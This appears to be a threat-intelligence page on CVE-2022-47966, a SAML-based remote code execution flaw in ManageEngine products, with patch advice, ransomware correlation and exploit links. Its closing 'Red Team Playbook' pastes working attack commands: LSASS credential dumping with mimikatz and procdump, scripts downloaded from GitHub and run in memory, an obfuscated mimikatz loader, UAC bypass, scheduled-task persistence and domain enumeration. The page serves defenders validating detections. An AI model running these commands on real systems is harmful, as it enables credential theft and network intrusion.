CVE-2022-47966
Overview
This vulnerability is a remote code execution flaw caused by insecure use of Apache Santuario xmlsec 1.4.1's XSLT processing features. The affected ManageEngine on-premise products rely on xmlsec for SAML SSO processing but fail to implement necessary security protections that the xmlsec library assumes are the application's responsibility. The flaw resides in the XML signature verification component that processes SAML responses, allowing crafted XML input to trigger unauthorized command execution.
Vulnerability Description
Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41. ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active).
Impact
An attacker can execute arbitrary system commands remotely on affected ManageEngine servers by sending crafted SAML responses, potentially gaining full control over the system. This does not require prior authentication but does require that SAML SSO was configured on the target product, with some requiring active SAML SSO. Successful exploitation can lead to complete compromise of the affected environment, including unauthorized access to sensitive data, disruption of services, and lateral movement within the network.
Solution
Apply vendor-provided patches as detailed in the ManageEngine security advisory at https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html. Specifically, upgrade affected products to versions at or beyond the fixed build numbers (e.g., ServiceDesk Plus 14004 or later, Access Manager Plus 4308 or later). No workaround is officially recommended; patching is the primary mitigation step to eliminate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Storm-0501
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability affecting multiple on-premise products from Zoho's ManageEngine suite is rooted in the use of an outdated version of Apache Santuario xmlsec, specifically version 1.4.1. This version has inherent design flaws related to its XSLT features, which place the onus of security protections on the application itself. Unfortunately, the affected ManageEngine applications failed to implement these necessary protections, leading to a critical risk of remote code execution. This vulnerability is particularly concerning as it allows an attacker to execute arbitrary code on the server, potentially leading to full system compromise.
Exploitation of this vulnerability is contingent upon the configuration of SAML Single Sign-On (SSO) within the affected products. If SAML SSO has been configured, and in some cases, if it is currently active, an attacker can leverage this weakness to execute malicious code remotely. The attack vector primarily involves crafting a specially designed XML document that exploits the lack of security measures in the application. Once the malicious XML is processed by the vulnerable application, the attacker can gain unauthorized access and control over the underlying system, leading to severe consequences.
The real-world impact of this vulnerability can be profound, especially for organizations relying on the affected ManageEngine products for critical operations. The potential for remote code execution means that attackers could manipulate sensitive data, disrupt services, or even deploy malware within the organization’s network. The business risks associated with such an exploit include financial losses, reputational damage, and legal ramifications, particularly if sensitive customer data is compromised. Organizations may also face regulatory scrutiny and compliance issues, especially in sectors that mandate stringent data protection measures.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of their ManageEngine installations to identify any affected versions. Regular vulnerability assessments and penetration testing can help uncover potential exploitation paths. It is crucial to apply patches and updates provided by Zoho to remediate the vulnerability. Additionally, organizations should implement robust security measures, such as intrusion detection systems and application firewalls, to monitor for unusual activity that may indicate an attempted exploitation. Educating staff about the risks associated with SAML SSO configurations and ensuring that only necessary features are enabled can further reduce the attack surface.
In conclusion, the vulnerability in the ManageEngine products represents a significant threat to organizations that utilize these tools for managing IT services. The combination of outdated software, reliance on flawed security features, and the potential for remote code execution creates a compelling case for immediate action. By adopting proactive security measures and maintaining an up-to-date software environment, organizations can better protect themselves against the risks posed by such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-47966, reflecting a doubling in observed activity over recent monitoring periods. This surge underscores increasing adversary interest and operationalization of the vulnerability, particularly given its critical severity and the availability of multiple proof-of-concept exploits circulating publicly. The persistence of ransomware groups such as Storm-0501 leveraging this vulnerability in their campaigns further elevates the threat landscape, signaling a higher likelihood of targeted intrusions and potential ransomware deployments against organizations using affected ManageEngine products. Although the Exploit Prediction Scoring System (EPSS) remains stable, the qualitative increase in exploitation attempts and the active use by ransomware actors necessitate heightened vigilance. Consequently, the risk level associated with CVE-2022-47966 has intensified, emphasizing its status as a critical vector for remote code execution attacks within enterprise IT environments.
Update 2 — June 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-47966, accompanied by a measurable increase in the Exploit Prediction Scoring System (EPSS) score, now approaching certainty of exploitation. This upward trend in telemetry reflects a growing adversary focus on this vulnerability, further corroborated by the proliferation of new proof-of-concept exploits and scanning tools circulating publicly. The sustained association of this vulnerability with ransomware groups, notably Storm-0501, underscores its operational value in ransomware campaigns and elevates the urgency for defenders to recognize this as an active and evolving threat vector. Consequently, the threat level for CVE-2022-47966 has intensified from critical to an elevated critical state, indicating an increased likelihood of successful remote code execution attacks within enterprise environments leveraging affected ManageEngine products.
Update 3 — July 08, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-47966, accompanied by the emergence of additional publicly available exploitation tools that broaden the attack surface across multiple ManageEngine products. Our telemetry indicates that adversaries, including ransomware-affiliated groups such as Storm-0501, are increasingly leveraging these new tools to automate scanning and exploitation efforts, thereby accelerating the pace and scale of attacks. This development intensifies the operational risk posed by this vulnerability, as the expanded toolkit lowers the barrier for less sophisticated threat actors to conduct successful remote code execution. Consequently, the threat level associated with CVE-2022-47966 has been elevated to reflect a heightened likelihood of compromise in enterprise environments, underscoring the critical need for vigilant detection and response measures.
Affected Products (156)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zohocorp | Manageengine Access Manager Plus | All |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4300:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4301:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4302:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4303:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4304:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4305:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4306:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Access Manager Plus | 4.3 |
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4307:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | All |
cpe:2.3:a:zohocorp:manageengine_ad360:*:*:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4300:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4302:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4303:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4304:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4305:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4306:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4308:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Ad360 | 4.3 |
cpe:2.3:a:zohocorp:manageengine_ad360:4.3:4309:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Adaudit Plus | All |
cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*
|
|
|
Zohocorp | Manageengine Adaudit Plus | 7.0 |
cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.0:7000:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (3)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
ManageEngine ADSelfService Plus Unauthenticated SAML RCE
exploits/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
|
Khoa Dinh, horizon3ai, Christophe De La Fuente | Unknown | - | View |
|
ManageEngine ServiceDesk Plus Unauthenticated SAML RCE
exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
|
Khoa Dinh, horizon3ai, Christophe De La Fuente | Unknown | - | View |
|
ManageEngine Endpoint Central Unauthenticated SAML RCE
exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966
|
Khoa Dinh, horizon3ai, Christophe De La Fuente | Unknown | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2022-47966
POC for CVE-2022-47966 affecting multiple ManageEngine products
|
horizon3ai | 129 | 30 | 2023-01-17 | View |
|
vonahisec/CVE-2022-47966-Scan
Python scanner for CVE-2022-47966. Supports ~10 of the 24 affected products.
|
vonahisec | 28 | 5 | 2023-01-23 | View |
|
sh4den/CVE-2022-47966
The manage engine mass loader for CVE-2022-47966
|
sh4den | 7 | 1 | 2023-01-23 | View |
|
SystemVll/CVE-2022-47966
The manage engine mass loader for CVE-2022-47966
|
SystemVll | 7 | 1 | 2023-01-23 | View |
|
ACE-Responder/CVE-2022-47966_checker
Run on your ManageEngine server
|
ACE-Responder | 2 | 3 | 2023-01-23 | View |
|
shameem-testing/PoC-for-ME-SAML-Vulnerability
PoC for cve-2022-47966
|
shameem-testing | 0 | 1 | 2023-01-19 | View |
Ransomware Groups 1
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.